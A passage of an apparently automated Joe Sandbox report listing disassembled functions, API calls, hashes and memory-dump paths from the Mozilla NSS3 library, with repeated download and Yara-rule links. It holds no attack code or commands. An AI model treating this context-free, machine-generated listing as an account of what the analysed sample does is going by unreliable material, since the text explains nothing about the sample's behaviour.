PR_IntervalNow.NSS3 ref: 6C7BA8C6
EnterCriticalSection.KERNEL32(?), ref: 6C7BA8EB
_PR_MD_UNLOCK.NSS3(?), ref: 6C7BA944
PR_SetPollableEvent.NSS3(?), ref: 6C7BA94F

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: CondCriticalEnterEventIntervalPollableSectioncalloc
String ID:
API String ID: 811965633-0
Opcode ID: 0cad9c72bd52a19c9607e4e4bc7449ca02b45df51b8c21a2f40d0f4e465cd903
Instruction ID: 5144d0d2ec3dce2d1edc8ba30aabafc7d31c80bcda1bbdc1759dee54926e71a6
Opcode Fuzzy Hash: 0cad9c72bd52a19c9607e4e4bc7449ca02b45df51b8c21a2f40d0f4e465cd903
Instruction Fuzzy Hash: 774146B4A01B029FC704DF2AC68495AFBF5FF48328725856AE859DBF11E731E850CB90

Function 6C712C80 Relevance: 6.1, APIs: 4, Instructions: 105COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE002,00000000,?,6C711289,?), ref: 6C712D72

Part of subcall function 6C713390: PORT_ZAlloc_Util.NSS3(00000000,-0000002C,?,6C712CA7,E80C76FF,?,6C711289,?), ref: 6C7133E9
Part of subcall function 6C713390: PORT_ZAlloc_Util.NSS3(0000001C), ref: 6C71342E

PK11_FreeSymKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6C711289,?), ref: 6C712D61

Part of subcall function 6C710B00: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C710B21
Part of subcall function 6C710B00: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C710B64

PR_SetError.NSS3(FFFFE02D,00000000,?,?,?,?,6C711289,?), ref: 6C712D88
PR_SetError.NSS3(FFFFE006,00000000,?,?,?,?,?,6C711289,?), ref: 6C712DAF

Part of subcall function 6C6CB8F0: PR_CallOnceWithArg.NSS3(6C802178,6C6CBCF0,?), ref: 6C6CB915
Part of subcall function 6C6CB8F0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000001,?), ref: 6C6CB933
Part of subcall function 6C6CB8F0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,?), ref: 6C6CB9C8
Part of subcall function 6C6CB8F0: SECITEM_AllocItem_Util.NSS3(00000000,00000000,00000008), ref: 6C6CB9E1

Part of subcall function 6C710A50: SECOID_GetAlgorithmTag_Util.NSS3(6C712A90,E8571076,?,6C712A7C,6C7121F1,?,?,?,00000000,00000000,?,?,6C7121DD,00000000), ref: 6C710A66

Part of subcall function 6C713310: SECOID_GetAlgorithmTag_Util.NSS3(?,00000000,FFFFFFFF,?,6C712D1E,?,?,?,?,00000000,?,?,?,?,?,6C711289), ref: 6C713348

Part of subcall function 6C7106F0: PORT_ZAlloc_Util.NSS3(0000000C,00000000,?,6C712E70,00000000), ref: 6C710701

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Util$AlgorithmAlloc_ErrorK11_Tag_$Item_Tokens$AllocCallFreeOnceWithZfree
String ID:
API String ID: 2288138528-0
Opcode ID: 8546e08e28100fe682e9ef3c81ee26992161300af297bb711fe42b1ebbdd5512
Instruction ID: 4e2ba19896299d99ab54ce41ad779c294f63a2b1b375f227e87e39a11c99729d
Opcode Fuzzy Hash: 8546e08e28100fe682e9ef3c81ee26992161300af297bb711fe42b1ebbdd5512
Instruction Fuzzy Hash: 1631E8B6914201ABDB009E64EE49E9A3769BF4631DF1C0130FC149BF91F731E928C7A2

Function 6C6A6C50 Relevance: 6.1, APIs: 4, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C6A6C8D
memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C6A6CA9
PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C6A6CC0
SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,6C7C8FE0), ref: 6C6A6CFE

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Util$Alloc_Arena$EncodeItem_memset
String ID:
API String ID: 2370200771-0
Opcode ID: b6ace196a75b1aa7f4a094c35a424e01a8add2693149f05f5443f33e4b1b1df8
Instruction ID: fa57f466aacb5bf4a2ca6d906bb550ab1b676df1ae73305a029c5e59d16fd900
Opcode Fuzzy Hash: b6ace196a75b1aa7f4a094c35a424e01a8add2693149f05f5443f33e4b1b1df8
Instruction Fuzzy Hash: B73180B5A002169FDB04DFA9C895ABFBBF5EF45348B10442DD906E7740EB31D906CBA4

Function 6C7B4F00 Relevance: 6.1, APIs: 4, Instructions: 101fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,40000000,00000003,00000000,?,?,00000000), ref: 6C7B4F5D
free.MOZGLUE(?), ref: 6C7B4F74
free.MOZGLUE(?), ref: 6C7B4F82
GetLastError.KERNEL32 ref: 6C7B4F90

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: free$CreateErrorFileLast
String ID:
API String ID: 17951984-0
Opcode ID: 68521782817051f4661e7edb572e19fdebbb977b1368f513294a336c77fb1c41
Instruction ID: 1c0b17a33063bdc3662128791f50ee0346ae05f2b7c86662bdceb8f66505acbf
Opcode Fuzzy Hash: 68521782817051f4661e7edb572e19fdebbb977b1368f513294a336c77fb1c41
Instruction Fuzzy Hash: 3631E775A002199FEB01CE69DD85BDFB3B8FF45398F080239EC25B7681D734E9059A91

Function 6C712880 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

NSS_CMSEncoder_Finish.NSS3(?), ref: 6C712896
NSS_CMSEncoder_Finish.NSS3(?), ref: 6C712932
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C71294C
free.MOZGLUE(?), ref: 6C712955

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Encoder_Finish$Arena_FreeUtilfree
String ID:
API String ID: 508480814-0
Opcode ID: caa1bd6591e3fb0c8ddf122a09b7bdd4e689571ee5c6c8af5ddea6dae7796e3e
Instruction ID: 9eb2da4d582519b964d85460a071f6230c5bcce72128835716a229b2bb8a948f
Opcode Fuzzy Hash: caa1bd6591e3fb0c8ddf122a09b7bdd4e689571ee5c6c8af5ddea6dae7796e3e
Instruction Fuzzy Hash: 0121C4B66086009FE7218B2AEE0DF477BE9AF86358F080538E449C7F61FB31E4198755

Function 6C720C00 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

PK11_DigestOp.NSS3(?,?,00000004), ref: 6C720C43

Part of subcall function 6C6CDEF0: TlsGetValue.KERNEL32 ref: 6C6CDF37
Part of subcall function 6C6CDEF0: EnterCriticalSection.KERNEL32(?), ref: 6C6CDF4B
Part of subcall function 6C6CDEF0: PR_SetError.NSS3(00000000,00000000), ref: 6C6CE02B
Part of subcall function 6C6CDEF0: PR_Unlock.NSS3(?), ref: 6C6CE07E

PK11_DigestOp.NSS3(?,?,00000008), ref: 6C720C85
PK11_DigestOp.NSS3(?,?,?), ref: 6C720C9F
PR_SetError.NSS3(FFFFD07F,00000000), ref: 6C720CB4

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: DigestK11_$Error$CriticalEnterSectionUnlockValue
String ID:
API String ID: 3186484790-0
Opcode ID: 7da2bc454f496c353506ea2ba2b1da5ea653da314acf9f49ecb3fc8083592b8c
Instruction ID: 612a46f03405b4366681dc672b2a58a8f5bfa177d6e4535f4e0d0586e1800b4c
Opcode Fuzzy Hash: 7da2bc454f496c353506ea2ba2b1da5ea653da314acf9f49ecb3fc8083592b8c
Instruction Fuzzy Hash: D12136716042869FCB01CB68A915BDABBA4AF25204F0981B4E8485F712E631D828C7B6

Function 6C712DF0 Relevance: 6.1, APIs: 4, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6C712E08

Part of subcall function 6C7014C0: TlsGetValue.KERNEL32 ref: 6C7014E0
Part of subcall function 6C7014C0: EnterCriticalSection.KERNEL32 ref: 6C7014F5
Part of subcall function 6C7014C0: PR_Unlock.NSS3 ref: 6C70150D

PORT_NewArena_Util.NSS3(00000400), ref: 6C712E1C
PORT_ArenaAlloc_Util.NSS3(00000000,00000064), ref: 6C712E3B
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C712E95

Part of subcall function 6C701200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C6A88A4,00000000,00000000), ref: 6C701228
Part of subcall function 6C701200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6C701238
Part of subcall function 6C701200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6C6A88A4,00000000,00000000), ref: 6C70124B
Part of subcall function 6C701200: PR_CallOnce.NSS3(6C802AA4,6C7012D0,00000000,00000000,00000000,?,6C6A88A4,00000000,00000000), ref: 6C70125D
Part of subcall function 6C701200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6C70126F
Part of subcall function 6C701200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6C701280
Part of subcall function 6C701200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6C70128E
Part of subcall function 6C701200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6C70129A
Part of subcall function 6C701200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6C7012A1

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: ArenaUtil$CriticalSection$Arena_EnterFreePoolUnlockValuefree$Alloc_CallClearDeleteMark_Once
String ID:
API String ID: 1441289343-0
Opcode ID: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
Instruction ID: 96fc2414188908071a6012fa2cfb141d0205f45da542346372ceb973cdd1b7ad
Opcode Fuzzy Hash: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
Instruction Fuzzy Hash: 1921D7B1E443454BEB00CF549E4C7AA37A86F9274CF150279ED085BB52F7B1E698C391

Function 6C732870 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

SECKEY_DestroyPrivateKey.NSS3(?), ref: 6C738915
SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6C738920
free.MOZGLUE(?), ref: 6C738929
free.MOZGLUE(?,-00000001,?,?,?,6C720279,?), ref: 6C738942

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Destroyfree$PrivatePublic
String ID:
API String ID: 4267951533-0
Opcode ID: e792b5ed3c1ddd12bfcb0a83088b8ef85bed46b63f436fcd93773a5b62b638bb
Instruction ID: eb4832ff7a2b7977a81ad112ec9672fdee4a9315034b6dc16d9edc30dfafe12b
Opcode Fuzzy Hash: e792b5ed3c1ddd12bfcb0a83088b8ef85bed46b63f436fcd93773a5b62b638bb
Instruction Fuzzy Hash: 17216F75602210DFDB04CF19E885EA63BF8FF86365B0940BAE90E9F712C731A815CB95

Function 6C6CACB0 Relevance: 6.1, APIs: 4, Instructions: 66COMMON

Download Yara Rule

APIs

CERT_NewCertList.NSS3 ref: 6C6CACC2

Part of subcall function 6C6A2F00: PORT_NewArena_Util.NSS3(00000800), ref: 6C6A2F0A
Part of subcall function 6C6A2F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C6A2F1D

Part of subcall function 6C6A2AE0: PORT_Strdup_Util.NSS3(?,?,?,?,?,6C6A0A1B,00000000), ref: 6C6A2AF0
Part of subcall function 6C6A2AE0: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6A2B11

CERT_DestroyCertList.NSS3(00000000), ref: 6C6CAD5E

Part of subcall function 6C6E57D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6C6AB41E,00000000,00000000,?,00000000,?,6C6AB41E,00000000,00000000,00000001,?), ref: 6C6E57E0
Part of subcall function 6C6E57D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6C6E5843

CERT_DestroyCertList.NSS3(?), ref: 6C6CAD36

Part of subcall function 6C6A2F50: CERT_DestroyCertificate.NSS3(?), ref: 6C6A2F65
Part of subcall function 6C6A2F50: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C6A2F83

free.MOZGLUE(?), ref: 6C6CAD4F

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Util$CertDestroyList$Arena_free$Alloc_ArenaCertificateFreeK11_Strdup_Tokenstolower
String ID:
API String ID: 132756963-0
Opcode ID: ac3643723041b8b9263bef14ec25149ec8f8ee1d11368145d25bf0a13aa6d906
Instruction ID: 3fe35c161c3a2d7ac7978904435f12cf0a575eea1a896e4175f9e39b28927c14
Opcode Fuzzy Hash: ac3643723041b8b9263bef14ec25149ec8f8ee1d11368145d25bf0a13aa6d906
Instruction Fuzzy Hash: CB21A4B5E001148BEB10DFA5D8055EE77B4EF0A318F054069D819B7B01F731AA55CBAA

Function 6C6CC860 Relevance: 6.1, APIs: 4, Instructions: 64threadCOMMON

Download Yara Rule

APIs

PK11_IsLoggedIn.NSS3(?,?), ref: 6C6CC890

Part of subcall function 6C6C8F70: PK11_GetInternalKeySlot.NSS3(?,?,00000002,?,?,?,6C6BDA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C6C8FAF
Part of subcall function 6C6C8F70: PR_Now.NSS3(?,?,00000002,?,?,?,6C6BDA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C6C8FD1
Part of subcall function 6C6C8F70: TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C6BDA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C6C8FFA
Part of subcall function 6C6C8F70: EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C6BDA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C6C9013
Part of subcall function 6C6C8F70: PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C6BDA9B,?,00000000,?,?,?,?,CE534353), ref: 6C6C9042
Part of subcall function 6C6C8F70: TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C6BDA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C6C905A
Part of subcall function 6C6C8F70: EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C6BDA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C6C9073
Part of subcall function 6C6C8F70: PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C6BDA9B,?,00000000,?,?,?,?,CE534353), ref: 6C6C9111

PR_GetCurrentThread.NSS3 ref: 6C6CC8B2

Part of subcall function 6C769BF0: TlsGetValue.KERNEL32(?,?,?,6C7B0A75), ref: 6C769C07

PK11_Authenticate.NSS3(?,00000001,?), ref: 6C6CC8D0
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C6CC8EB

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: K11_Value$CriticalEnterSectionUnlock$AuthenticateCurrentInternalItem_LoggedSlotThreadUtilZfree
String ID:
API String ID: 999015661-0
Opcode ID: 477a7ae121ca17423d818f87d30b67f1952193dc40be73abf14df5b980759708
Instruction ID: f2ce096e3e099f5191b8b625741d352749109dcc29519bd6668251c866a040c7
Opcode Fuzzy Hash: 477a7ae121ca17423d818f87d30b67f1952193dc40be73abf14df5b980759708
Instruction Fuzzy Hash: A101A566F022117BD7102AB9ACC0ABF3E69DB4635CF080139FD05A6B11F761885992EB

Function 6C6FECB0 Relevance: 6.1, APIs: 4, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800,?,00000001,?,6C6FF0AD,6C6FF150,?,6C6FF150,?,?,?), ref: 6C6FECBA

Part of subcall function 6C700FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C6A87ED,00000800,6C69EF74,00000000), ref: 6C701000
Part of subcall function 6C700FF0: PR_NewLock.NSS3(?,00000800,6C69EF74,00000000), ref: 6C701016
Part of subcall function 6C700FF0: PL_InitArenaPool.NSS3(00000000,security,6C6A87ED,00000008,?,00000800,6C69EF74,00000000), ref: 6C70102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,?,?), ref: 6C6FECD1

Part of subcall function 6C7010C0: TlsGetValue.KERNEL32(?,6C6A8802,00000000,00000008,?,6C69EF74,00000000), ref: 6C7010F3
Part of subcall function 6C7010C0: EnterCriticalSection.KERNEL32(?,?,6C6A8802,00000000,00000008,?,6C69EF74,00000000), ref: 6C70110C
Part of subcall function 6C7010C0: PL_ArenaAllocate.NSS3(?,?,?,6C6A8802,00000000,00000008,?,6C69EF74,00000000), ref: 6C701141
Part of subcall function 6C7010C0: PR_Unlock.NSS3(?,?,?,6C6A8802,00000000,00000008,?,6C69EF74,00000000), ref: 6C701182
Part of subcall function 6C7010C0: TlsGetValue.KERNEL32(?,6C6A8802,00000000,00000008,?,6C69EF74,00000000), ref: 6C70119C

PORT_ArenaAlloc_Util.NSS3(00000000,0000003C,?,?,?,?,?), ref: 6C6FED02

Part of subcall function 6C7010C0: PL_ArenaAllocate.NSS3(?,6C6A8802,00000000,00000008,?,6C69EF74,00000000), ref: 6C70116E

PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?), ref: 6C6FED5A

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Arena$Util$Alloc_AllocateArena_Value$CriticalEnterFreeInitLockPoolSectionUnlockcalloc
String ID:
API String ID: 2957673229-0
Opcode ID: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
Instruction ID: 203cfd7736416c011cdf45d66727bcbec39530c75aa3e9dc1ac51966e425f2d5
Opcode Fuzzy Hash: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
Instruction Fuzzy Hash: 8B21D4B1A007429BE700CF25D948B52BBE5BFA5308F15C215E81C87A62EB70E595C7E4

Function 6C72ED10 Relevance: 6.1, APIs: 4, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C72ED34
realloc.MOZGLUE(?,?), ref: 6C72ED5D
PORT_Alloc_Util.NSS3(?), ref: 6C72ED74

Part of subcall function 6C700BE0: malloc.MOZGLUE(6C6F8D2D,?,00000000,?), ref: 6C700BF8
Part of subcall function 6C700BE0: TlsGetValue.KERNEL32(6C6F8D2D,?,00000000,?), ref: 6C700C15

memset.VCRUNTIME140(?,?,?), ref: 6C72ED97

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Alloc_ErrorUtilValuemallocmemsetrealloc
String ID:
API String ID: 2992043971-0
Opcode ID: 3d1841992b27760a7fec8cfd9f30e525db99cb3f1ab9fe713fd2b2f97832c79f
Instruction ID: 40c1c331afcc080a90baa55478105eb5e5cefda7e89c88162799657bc2ff2d15
Opcode Fuzzy Hash: 3d1841992b27760a7fec8cfd9f30e525db99cb3f1ab9fe713fd2b2f97832c79f
Instruction Fuzzy Hash: CE11C6B060070A6BE7109E35DE89B56B3A8EF0035EF244535ED1992B41E339F464CBE1

Function 6C6F4900 Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE09A,00000000,00000004,6C6DC79F,?,?,6C6F5C4A,?), ref: 6C6F4950

Part of subcall function 6C6F8800: TlsGetValue.KERNEL32(?,6C70085A,00000000,?,6C6A8369,?), ref: 6C6F8821
Part of subcall function 6C6F8800: TlsGetValue.KERNEL32(?,?,6C70085A,00000000,?,6C6A8369,?), ref: 6C6F883D
Part of subcall function 6C6F8800: EnterCriticalSection.KERNEL32(?,?,?,6C70085A,00000000,?,6C6A8369,?), ref: 6C6F8856
Part of subcall function 6C6F8800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6C6F8887
Part of subcall function 6C6F8800: PR_Unlock.NSS3(?,?,?,?,6C70085A,00000000,?,6C6A8369,?), ref: 6C6F8899

TlsGetValue.KERNEL32(?,?,?), ref: 6C6F496A
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6F497A
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6F4989

Memory Dump Source

